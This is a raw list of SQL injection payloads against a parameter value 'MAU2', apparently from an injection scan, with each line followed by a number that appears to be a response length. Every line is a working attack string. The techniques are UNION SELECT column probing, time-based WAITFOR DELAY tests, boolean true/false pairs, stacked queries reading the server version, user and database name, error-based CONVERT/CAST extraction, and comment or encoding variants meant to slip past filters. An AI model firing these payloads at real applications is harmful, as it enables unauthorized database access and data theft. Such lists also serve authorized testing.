MAU2'+UNION+SELECT+NULL--|4452
MAU2'+UNION+ALL+SELECT+NULL--|4464
MAU2'+UNION+SELECT+NULL,NULL--|4467
MAU2'+UNION+SELECT+NULL,NULL,NULL--|4482
MAU2'/**/UNION/**/SELECT/**/NULL--|4485
MAU2';WAITFOR+DELAY+'0:0:5'--|4474
MAU2';WAITFOR+DELAY+'00:00:05'--|4481
MAU2'+WAITFOR+DELAY+'0:0:5'--|4472
MAU2'%3bWAITFOR+DELAY+'0:0:5'--|4474
MAU2'+AND+'1'='1|4439
MAU2'+AND+'1'='2|4439
MAU2'+AND+1=1--|4432
MAU2'+AND+1=2--|4432
MAU2'/**/AND/**/1=1--|4454
MAU2'/**/AND/**/1=2--|4454
MAU2';SELECT+@@VERSION--|4457
MAU2';SELECT+USER--|4440
MAU2';SELECT+DB_NAME()--|4453
MAU2';SELECT+SYSTEM_USER--|4459
MAU2'+AND+1=CONVERT(INT,@@VERSION)--|4487
MAU2'+AND+1=CAST(@@VERSION+AS+INT)--|4485
MAU2'||'MAU2|4429
MAU2'+'MAU2|4424
MAU2'%2b'MAU2|4426
MAU2'/**/||/**/'MAU2|4457
